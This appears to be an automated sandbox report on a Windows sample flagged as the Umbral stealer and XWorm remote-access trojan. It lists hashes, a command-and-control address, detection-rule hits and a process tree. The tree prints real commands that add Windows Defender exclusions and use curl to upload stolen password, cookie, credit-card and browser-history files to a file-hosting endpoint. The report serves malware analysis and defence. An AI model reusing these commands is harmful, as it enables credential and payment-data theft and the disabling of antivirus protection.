umbral | 2fa899e1197c8a1ce033230b147ae1d406172e439a712f55f51104156ce55fcd

Analysis

max time kernel
30s
max time network
25s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Command.exe
Size

8.9MB
MD5

7b2f691115519bac6d213c8a69e35e1e
SHA1

137fd5d39ee8ff2c0b57af3ab82a868cc8daf2f6
SHA256

2fa899e1197c8a1ce033230b147ae1d406172e439a712f55f51104156ce55fcd
SHA512

73e439123a4ef857858e03f436270651142fb8c143fb50570808418fde14bc737b36c906e9d7e07db76d089cfc4f76698e093f720fef3b33f1a286231713afb5
SSDEEP

196608:uGrAom6nkx0piDMuw+knVthdXlqVfPtoiqjuM:lIyMDXi3hdQVPtonyM

Score

10^/10

umbral xworm discovery execution pyinstaller rat stealer trojan upx

Malware Config

Extracted

Family

xworm

22.ip.gl.ply.gg:55064

Attributes

Install_directory
%AppData%
install_file
Windows Command.exe

Signatures

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral1/files/0x000400000001e57c-90.dat	family_umbral
behavioral1/files/0x000400000001e57c-95.dat	family_umbral
behavioral1/files/0x000400000001e57c-94.dat	family_umbral
behavioral1/files/0x000400000001e57c-101.dat	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000234d8-273.dat	family_xworm
behavioral1/memory/2412-331-0x0000000000580000-0x000000000059A000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3144	powershell.exe
1420	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1144	Command.exe

Loads dropped DLL 5 IoCs

pid	Process
1144	Command.exe
1144	Command.exe
1144	Command.exe
1144	Command.exe
1144	Command.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
33	discord.com
40	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	api.ipify.org

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3584	tasklist.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2964-410-0x00007FF9880A0000-0x00007FF9880AF000-memory.dmp	upx
behavioral1/memory/2964-462-0x00007FF987250000-0x00007FF987269000-memory.dmp	upx
behavioral1/memory/2964-513-0x00007FF987880000-0x00007FF98788D000-memory.dmp	upx
behavioral1/memory/2964-552-0x00007FF970180000-0x00007FF9702ED000-memory.dmp	upx
behavioral1/memory/2964-537-0x00007FF983450000-0x00007FF98346E000-memory.dmp	upx
behavioral1/memory/4236-567-0x00007FF96FD10000-0x00007FF970175000-memory.dmp	upx
behavioral1/memory/2964-570-0x00007FF9806A0000-0x00007FF980756000-memory.dmp	upx
behavioral1/memory/2964-612-0x00007FF987250000-0x00007FF987269000-memory.dmp	upx
behavioral1/memory/4236-616-0x00007FF96F280000-0x00007FF96F5F4000-memory.dmp	upx
behavioral1/memory/4236-617-0x00007FF97FB70000-0x00007FF97FC26000-memory.dmp	upx
behavioral1/memory/2964-625-0x00007FF983020000-0x00007FF98304E000-memory.dmp	upx
behavioral1/memory/2580-787-0x00007FF96E6F0000-0x00007FF96EB55000-memory.dmp	upx
behavioral1/memory/4236-786-0x00007FF980090000-0x00007FF9800BE000-memory.dmp	upx
behavioral1/memory/4236-813-0x00007FF96F280000-0x00007FF96F5F4000-memory.dmp	upx
behavioral1/memory/2580-841-0x00007FF96DC60000-0x00007FF96DC7E000-memory.dmp	upx
behavioral1/memory/2580-845-0x00007FF96D5A0000-0x00007FF96D656000-memory.dmp	upx
behavioral1/memory/2580-870-0x00007FF96DA50000-0x00007FF96DA60000-memory.dmp	upx
behavioral1/memory/2580-876-0x00007FF96E6F0000-0x00007FF96EB55000-memory.dmp	upx
behavioral1/memory/2580-875-0x00007FF96D3D0000-0x00007FF96D3F2000-memory.dmp	upx
behavioral1/memory/2580-874-0x00007FF96D400000-0x00007FF96D518000-memory.dmp	upx
behavioral1/memory/2580-873-0x00007FF96DA10000-0x00007FF96DA25000-memory.dmp	upx
behavioral1/memory/2580-872-0x00007FF96DA30000-0x00007FF96DA44000-memory.dmp	upx
behavioral1/memory/2580-869-0x00007FF96DA60000-0x00007FF96DA74000-memory.dmp	upx
behavioral1/memory/2964-926-0x00007FF96A410000-0x00007FF96ABB1000-memory.dmp	upx
behavioral1/memory/2580-1087-0x00007FF96DAF0000-0x00007FF96DC5D000-memory.dmp	upx
behavioral1/memory/4236-1127-0x00007FF96C0A0000-0x00007FF96C0D6000-memory.dmp	upx
behavioral1/memory/2580-1134-0x00007FF96DA80000-0x00007FF96DAAE000-memory.dmp	upx
behavioral1/memory/4236-1177-0x00007FF9746D0000-0x00007FF9746F2000-memory.dmp	upx
behavioral1/memory/4236-1191-0x00007FF96C0A0000-0x00007FF96C0D6000-memory.dmp	upx
behavioral1/memory/4236-1184-0x00007FF9684B0000-0x00007FF968C51000-memory.dmp	upx
behavioral1/files/0x0008000000023610-1274.dat	upx
behavioral1/files/0x00070000000238eb-1401.dat	upx
behavioral1/memory/2580-1428-0x00007FF96A090000-0x00007FF96A404000-memory.dmp	upx
behavioral1/memory/2580-1441-0x00007FF974A20000-0x00007FF974A3E000-memory.dmp	upx
behavioral1/memory/2964-1525-0x00007FF987AE0000-0x00007FF987B04000-memory.dmp	upx

Detects Pyinstaller 9 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000400000001e57c-90.dat	pyinstaller
behavioral1/files/0x000400000001e57c-95.dat	pyinstaller
behavioral1/files/0x000400000001e57c-94.dat	pyinstaller
behavioral1/files/0x000400000001e57c-101.dat	pyinstaller
behavioral1/files/0x000500000001e57d-106.dat	pyinstaller
behavioral1/files/0x000500000001e57d-108.dat	pyinstaller
behavioral1/files/0x000400000001e57e-155.dat	pyinstaller
behavioral1/files/0x000400000001e57e-226.dat	pyinstaller
behavioral1/files/0x000400000001e57e-332.dat	pyinstaller

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x0007000000023762-846.dat	embeds_openssl

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1084	WMIC.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 828 wrote to memory of 1144	828	Command.exe	84
PID 828 wrote to memory of 1144	828	Command.exe	84

C:\Users\Admin\AppData\Local\Temp\Command.exe
"C:\Users\Admin\AppData\Local\Temp\Command.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:828
- C:\Users\Admin\AppData\Local\Temp\onefile_828_133725255074230394\Command.exe
  C:\Users\Admin\AppData\Local\Temp\Command.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Command.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\bound.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1420
- - C:\Users\Admin\AppData\Local\Temp\bound.exe
    "C:\Users\Admin\AppData\Local\Temp\bound.exe"
    3⤵
    PID:2532
  - - C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
      4⤵
      PID:1332
    - - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
        5⤵
        
        PID:1492
      - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
        6⤵
        
        PID:2072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:2140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:3432
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:3424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:1056
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:2092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:4772
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:3168
    - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
        5⤵
        
        PID:4988
    - - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
        5⤵
        
        PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
      "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
      4⤵
      PID:4800
    - - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
        5⤵
        
        PID:4684
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:4628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:5060
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        7⤵
        
        PID:4468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:5100
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
        7⤵
        
        PID:4524
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:1056
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
        7⤵
        
        PID:4024
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:5156
  - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
      "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
      4⤵
      PID:1108
    - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
        5⤵
        
        PID:2964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        6⤵
        
        PID:1928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:32
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:3584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        6⤵
        
        PID:1080
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        7⤵
        
        PID:4752
  - - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
      "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
      4⤵
      PID:2412

C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
"C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
1⤵
PID:4776
- C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
  "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
  2⤵
  PID:1464
- - C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
    "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
    3⤵
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
      4⤵
      PID:3928
    - - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
        5⤵
        
        PID:3560
      - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
        6⤵
        
        PID:5444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:5596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:5072
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:3732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:5844
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:3424
    - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
        5⤵
        
        PID:4492
      - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
        6⤵
        
        PID:1332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:5564
    - - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
        5⤵
        
        PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
      "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
      4⤵
      PID:3624
- - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
    "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
    3⤵
    PID:3764
  - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
      "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
      4⤵
      PID:4748
- C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
  "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
  2⤵
  PID:1000
- C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
  "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
  2⤵
  PID:2552
- - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
    "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
    3⤵
    PID:3428
- C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
  "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
  2⤵
  PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
1⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
1⤵
PID:3464

C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
"C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
1⤵
PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
  2⤵
  PID:4324
- - C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
    3⤵
    PID:3480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile"
  2⤵
  PID:748
- - C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
    3⤵
    PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile"
  2⤵
  PID:5700
- - C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store4.gofile.io/uploadFile
    3⤵
    PID:5436

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
1⤵
- Detects videocard installed
PID:1084

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
1⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
"C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
1⤵
PID:644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile"
  2⤵
  PID:456

C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
"C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
1⤵
PID:2924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
  2⤵
  PID:6080
- - C:\Windows\system32\curl.exe
    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
    3⤵
    PID:1592

C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
"C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
1⤵
PID:6008
- C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
  "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
  2⤵
  PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2468
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:2788

C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
"C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
1⤵
PID:5104
- C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
  "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
  2⤵
  PID:5396

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
1⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
"C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
1⤵
PID:5308
- C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
  "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
  2⤵
  PID:4432
- - C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
    "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
    3⤵
    PID:5672
  - - C:\Users\Admin\AppData\Local\Temp\BOUND.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOUND.EXE"
      4⤵
      PID:1944
    - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
        5⤵
        
        PID:392
    - - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
        5⤵
        
        PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
      "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
      4⤵
      PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
      "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
      4⤵
      PID:5800
    - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
        5⤵
        
        PID:4444
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:5388
  - - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
      "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
      4⤵
      PID:5424
- - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
    "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
    3⤵
    PID:6128
  - - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
      "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
      4⤵
      PID:4924
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:744
- - C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
    "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
    3⤵
    PID:4048
- C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
  "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
  2⤵
  PID:3216
- - C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
    "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
    3⤵
    PID:3656
- C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
  "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
  2⤵
  PID:5412
- - C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
    "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
    3⤵
    PID:5272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:1944
- C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
  "C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
  2⤵
  PID:4324

C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
"C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
1⤵
PID:5364
- C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
  "C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
  2⤵
  PID:5404

C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
"C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
1⤵
PID:5620
- C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
  "C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
  2⤵
  PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:2388

C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE
"C:\Users\Admin\AppData\Local\Temp\WINDOWS COMMAND.EXE"
1⤵
PID:5792

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
1⤵
PID:4312

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
1⤵
PID:5604

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile
1⤵
PID:5752

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store4.gofile.io/uploadFile
1⤵
PID:392

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
1⤵
PID:5552

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store4.gofile.io/uploadFile
1⤵
PID:6076

C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE
"C:\Users\Admin\AppData\Local\Temp\SOLARA.EXE"
1⤵
PID:5596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "ver"
  2⤵
  PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store4.gofile.io/uploadFile"
1⤵
PID:116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
1⤵
PID:2796

C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store4.gofile.io/uploadFile
1⤵
PID:3672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

Filesize
78KB

MD5
b45e82a398713163216984f2feba88f6

SHA1
eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839

SHA256
4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8

SHA512
b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

Filesize
117KB

MD5
79f339753dc8954b8eb45fe70910937e

SHA1
3ad1bf9872dc779f32795988eb85c81fe47b3dd4

SHA256
35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007

SHA512
21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
57KB

MD5
cfb9e0a73a6c9d6d35c2594e52e15234

SHA1
b86042c96f2ce6d8a239b7d426f298a23df8b3b9

SHA256
50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6

SHA512
22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

Filesize
72KB

MD5
5dd51579fa9b6a06336854889562bec0

SHA1
